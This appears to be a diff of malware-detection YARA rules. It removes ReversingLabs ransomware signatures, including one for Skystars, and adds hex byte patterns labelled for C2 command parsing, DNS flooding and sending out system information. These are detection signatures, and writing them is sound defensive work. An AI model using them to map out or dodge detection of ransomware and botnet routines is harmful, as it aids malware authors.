?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 0F 31 31 C9 89 C6 8D 44 24 ?? 31 FF C7 44 24 ?? ?? ?? ?? ?? 01 CE 89 04 24 11 D7 E8 + ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 89 C1 31 C0 31 DB 01 C1 8D 44 + 24 ?? 11 D3 C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? + 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 29 F1 19 FB 2B 44 24 ?? 89 4C 24 ?? 89 5C 24 ?? 69 + C0 ?? ?? ?? ?? DF 6C 24 ?? 03 44 24 ?? 2B 44 24 ?? D9 7C 24 ?? 89 44 24 ?? DB 44 24 + ?? DE F9 0F B7 44 24 ?? B4 ?? 66 89 44 24 ?? D9 6C 24 ?? DB 5C 24 ?? D9 6C 24 ?? 8B + 5C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? + C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 04 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F C3 } - $encrypt_files_p2 = { - 85 ?? ?? ?? ?? 2B 5D ?? 75 ?? EB ?? 8B 7D ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 33 - C0 3B 45 ?? 77 ?? 72 ?? 3B 5D ?? 73 ?? 8B C3 EB ?? 8B 45 ?? 29 45 ?? 8B 4D ?? 83 5D - ?? ?? 0B 4D ?? 75 ?? 8B 4D ?? 89 4D ?? 03 F0 2B D8 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B 4D - ?? 0F AC C8 ?? C1 E9 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? F7 E1 29 45 ?? 19 55 ?? 01 45 ?? - 11 55 ?? 83 7D ?? ?? 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 85 C0 89 45 ?? 0F 84 ?? ?? ?? ?? - 8B 7D ?? 8D 47 ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 74 ?? 83 7D ?? - ?? 74 ?? 8B 4D ?? 8B 45 ?? 8B D1 0B D0 74 ?? 0F AC C1 ?? C1 E8 ?? 83 4F ?? ?? 89 4F - ?? 89 75 ?? 39 75 ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39 - 75 ?? 74 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 85 DB 0F 85 - ?? ?? ?? ?? E9 ?? ?? ?? ?? 01 75 ?? 83 55 ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF - D7 EB ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 5F 5E 5B C9 C2 + $parse_c2_commands_32 = { + 55 31 C0 57 B9 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? 0F B6 94 24 + ?? ?? ?? ?? 89 DF F3 AB C7 04 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 83 E0 ?? 89 84 24 ?? ?? ?? ?? 90 A1 ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 E8 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 89 74 24 ?? + C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F + 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 + ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 0F 84 ?? + ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB + 8D B4 24 ?? ?? ?? ?? B0 ?? 8D BC 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? B1 ?? F3 A5 89 + D6 8B BC 24 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 C7 ?? ?? ?? ?? 0F 85 + ?? ?? ?? ?? 89 C1 C1 E9 ?? A8 ?? F3 A5 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 89 + 54 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? + 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3 } - - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) -} -rule REVERSINGLABS_Win32_Ransomware_Skystars : TC_DETECTION MALICIOUS MALWARE FILE -{ - meta: - description = "Yara rule that detects Skystars ransomware." - author = "ReversingLabs" - id = "9dc19bda-c5bd-58fb-8c4f-a7d8a6fbbce9" - date = "2020-11-20" - modified = "2020-11-20" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Skystars.yara#L1-L97" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "352d22183b0974908ce684725fe85b4714ac5959c3bddf093b54383195881a5a" - score = 75 - quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Skystars" - tc_detection_factor = 5 - importance = 25 - - strings: - $search_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? - 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 - 6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB - 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? - 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? - ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? - ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D - ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? - 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A - ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? - 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33 + $dns_flood_32_p1 = { + 55 57 56 53 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? 8B + B4 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? F6 C3 ?? 89 DF 0F 85 ?? ?? ?? ?? 89 C1 C1 E9 ?? A8 + ?? F3 A5 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? + 89 F7 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 + C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? F7 35 ?? ?? ?? + ?? 8B 04 95 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 C5 8D + 44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 AB 8D 54 24 ?? + 89 14 24 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 84 24 ?? + ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? + ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 14 24 89 74 24 ?? 89 54 24 ?? C6 84 24 ?? ?? ?? ?? + ?? C6 84 24 ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? + ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 } - $search_files_p2 = { - B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? - ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? - 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 - ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? - ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? - ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D ?? FF - 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D - ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? - 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 - ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 + $dns_flood_32_p2 = { + 24 ?? 89 D1 8B 39 83 C1 ?? 8D 87 ?? ?? ?? ?? F7 D7 21 F8 25 ?? ?? ?? ?? 74 ?? A9 ?? + ?? ?? ?? 0F 84 ?? ?? ?? ?? 00 C0 89 D7 83 D9 ?? 29 D1 8D 84 0C ?? ?? ?? ?? 66 C7 00 + ?? ?? 66 C7 40 ?? ?? ?? 8B 0F 83 C7 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? + 74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 00 C0 8D 44 24 ?? 83 DF ?? C7 44 24 ?? + ?? ?? ?? ?? 29 D7 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 74 + 24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 89 14 24 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 94 24 ?? ?? ?? ?? 89 5C 24 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? + 83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C7 ?? 89 C2 + C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 C7 + 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 2C 24 F7 35 ?? ?? ?? ?? + 8B 04 95 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44 + 24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 83 80 ?? ?? ?? ?? ?? 83 90 ?? ?? ?? ?? ?? + 83 3D ?? ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8 } - $encrypt_files = { - 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 - 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 - ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF - 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? - ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 68 ?? ?? - ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? - ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? - 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? - ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? - 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 - 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 - 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? - ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 - ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 + $collect_system_information_64_p1 = { + 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ?? + ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? + ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? + ?? 0F 31 48 89 D3 48 8D 7C 24 ?? 31 F6 48 C1 E3 ?? 89 C0 48 01 C3 E8 ?? ?? ?? ?? BF + ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24 ?? 31 F6 48 C1 E5 ?? 89 C0 45 + 31 E4 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 44 24 ?? 48 29 DD 48 8B 54 24 ?? + 2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 48 8D AC 24 ?? ?? ?? ?? 69 C0 ?? ?? ?? ?? + 01 D0 F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ?? + ?? ?? ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05 + ?? ?? ?? ?? BF ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE + ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3 48 AB } - $main_routine = { - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 - ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? - ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D - ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 - E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 89 45 - ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? - ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? - 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B E5 5D C3 + $collect_system_information_64_p2 = { + 48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 + ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E0 B9 + ?? ?? ?? ?? 48 89 DF F3 48 AB 8B 44 24 ?? BE ?? ?? ?? ?? 48 89 DF 8D 90 ?? ?? ?? ?? + 85 C0 0F 49 D0 31 C0 C1 FA ?? 89 54 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE BF + ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? BE ?? + ?? ?? ?? BF ?? ?? ?? ?? 41 89 C5 E8 ?? ?? ?? ?? 4C 89 E0 B9 ?? ?? ?? ?? 48 89 EF F3 + 48 AB 48 89 DF 48 89 DA 48 89 EE B1 ?? F3 48 AB BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 85 + ED 75 ?? BA ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? + E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF + ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ?? 31 C9 + BA ?? ?? ?? ?? 31 F6 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D C3 + } + $send_system_info_64 = { + 55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 + 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ?? + ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D3 31 F6 48 89 E7 48 C1 E3 ?? 89 + C0 48 01 C3 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24 + ?? 31 F6 89 C0 48 C1 E5 ?? 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 04 24 48 29 + DD 48 8B 54 24 ?? 2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 69 C0 ?? ?? ?? ?? 01 D0 + F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ?? ?? ?? + ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? BA ?? ?? ?? ?? + BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? BA ?? ?? ?? ?? + BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5D C3 + } + $parse_c2_commands_64 = { + 41 57 31 C0 49 89 FF B9 ?? ?? ?? ?? 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 + 8D 9C 24 ?? ?? ?? ?? 40 88 B4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D A4 24 ?? + ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 DF F3 48 AB C7 07 ?? ?? ?? ?? BF ?? ?? ?? ?? + E8 ?? ?? ?? ?? 48 8D 43 ?? 48 89 84 24 ?? ?? ?? ?? 0F 1F 00 8B 3D ?? ?? ?? ?? 31 C9 + BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B B4 24 ?? ?? + ?? ?? 45 85 F6 0F 84 ?? ?? ?? ?? 31 C0 44 89 F6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84 + 24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? + ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? + ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 85 + ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 48 AB 48 8B 84 24 ?? ?? + ?? ?? 4C 8B 9C 24 ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 8B + 84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? + 48 8B 84 24 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B 94 24 + ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? + 48 8B AC 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24 + ?? ?? ?? ?? 4C 89 9C 24 ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ?? + 4C 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 B4 24 + ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? + 4C 89 A4 24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 + ?? ?? ?? ?? 49 89 57 ?? 48 8B 94 24 ?? ?? ?? ?? 49 89 77 ?? 48 8D B4 24 + } + $dns_flood_64_p1 = { + 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 49 89 + FC BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 89 D9 4C 89 E6 48 8D AC 24 ?? ?? ?? ?? F3 48 A5 + 8B 06 48 89 CB 89 07 0F B7 46 ?? 8B 35 ?? ?? ?? ?? 66 89 47 ?? BF ?? ?? ?? ?? 31 C0 + E8 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 C7 04 24 ?? ?? + 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? F7 35 ?? ?? + ?? ?? 89 D2 8B 04 95 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ?? + ?? ?? 48 89 E6 89 C7 41 89 C5 E8 ?? ?? ?? ?? 48 89 D8 B9 ?? ?? ?? ?? 48 89 EF F3 48 + AB 48 8D 7C 24 ?? BE ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? + 48 8D 7D ?? 48 8D 74 24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? 00 + 00 E8 ?? ?? ?? ?? 48 89 EE 48 89 DF C6 84 24 ?? ?? ?? ?? ?? C6 84 24 + } + $dns_flood_64_p2 = { + 66 C7 84 24 ?? ?? 00 00 ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 66 